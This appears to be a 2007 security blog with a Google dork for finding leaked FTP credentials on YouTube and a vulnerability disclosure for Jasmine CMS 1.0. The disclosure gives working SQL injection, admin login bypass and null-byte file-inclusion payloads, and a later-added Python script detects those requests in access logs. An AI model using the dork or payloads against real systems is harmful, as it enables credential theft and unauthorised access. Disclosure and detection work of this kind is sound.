Tuesday 19 June 2007

Google indexes FTP Credentials from YouTube...How Ironic!

Lyecdevf (a member of the w4ck1ng community) recently started a thread on how Google indexes plain-text FTP credentials of YouTube users.

In his own words:

"This is basically a google dork. What basically happens is that if someone is logged in to his/her FTP account and checks a page which embeds a YouTube video through the FTP client, YouTube will register that as a hit from "username:password@domain.tld", simply put.

Which means that you are going to get his login information to his FTP server. Enjoy!

site:youtube.com "clicks from ftp @""

Which is a pretty cool find. But does anybody see the irony in this? I certainly do!

Original Thread:
http://www.w4ck1ng.com/board/showthread.php/new-youtube-exploit-ftp-5521.html

Multiple Vulnerabilities In Jasmine CMS 1.0

Foreword:

If you're thinking about installing this appalling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. To list all the possible vulnerabilities would just be silly so I'll list one of every attack type:

SQL Injection:

news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*

Admin Login Bypass:

Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*

Password = Anything or Nothing

Local File Inclusion:

admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00

...and I'm pretty sure there are tons of XSS vulns in here too.

Exploit:

http://www.w4ck1ng.com/board/showthread.php/0day-jasmine-cms-1-5525.html?p=22785
http://milw0rm.com/exploits/4081
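
A log check for the two GET-parameter issues listed above, as an added example that is not from the original post or from the Jasmine CMS code: it scans web access-log lines for `item` values that are not plain integers and `u` values that carry a NUL byte or path characters. The log format, the sample lines, and the premise that `item` is a numeric id and `u` a bare plugin name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses, sizes and the file name are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jun/2007:10:00:01 +0000] "GET /news.php?item=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Jun/2007:10:00:07 +0000] "GET /news.php?item=-999%20UNION%20SELECT%20'
    '0,password,0,0,0,0,username%20FROM%20user%20WHERE%20id=1/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [19/Jun/2007:10:00:09 +0000] "GET /admin/plugin_manager.php'
    '?u=..%2F..%2Fconstructed.txt%00 HTTP/1.1" 200 1530',
    '192.0.2.10 - - [19/Jun/2007:10:00:15 +0000] "GET /admin/plugin_manager.php?u=gallery HTTP/1.1" 200 2210',
]

# Client address and request target from a common-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_param(path, name, value):
    """Return a reason if a decoded value is outside what the script should accept."""
    if path.endswith("/news.php") and name == "item":
        # Assumption: item is a numeric row id, so anything else is suspect.
        if not re.fullmatch(r"\d{1,10}", value):
            return "news.php item is not a plain integer id"
    if path.endswith("/admin/plugin_manager.php") and name == "u":
        # A NUL byte truncates the path in old PHP file functions.
        if "\x00" in value:
            return "plugin_manager.php u contains a NUL byte"
        # Assumption: u is a bare plugin name with no path separators.
        if not re.fullmatch(r"[A-Za-z0-9_-]+", value):
            return "plugin_manager.php u is not a bare plugin name"
    return None

def scan(lines):
    """Return (client, path, reason) for every request that fails a check."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = check_param(url.path, name, value)
            if reason:
                findings.append((client, url.path, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

The admin login bypass travels in a POST body, which standard access logs do not record, so catching it needs application-level logging of failed and anomalous logins.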





Monday 18 June 2007

First post, but someone took my site!

So I finally decided to get with the times and start up my own weblog. I don't usually conform to online trends like MySpace, Facebook & blogs in general. That doesn't mean I don't like visiting other people's...just don't like playing along.

So there's me thinking I'm gonna have a nice blog url to give people (silentz.blogspot.com)...but no, someone already took that about 5 years ago and decided not to use it! Oh well, guess I'll have to make do with the one I've got.

This blog will be more or less a place for me to release my exploits but more of a place to ramble on about the actual vulnerability. Also to just air my views on general information security issues and whatnot.

I hope you enjoy it!
Silentz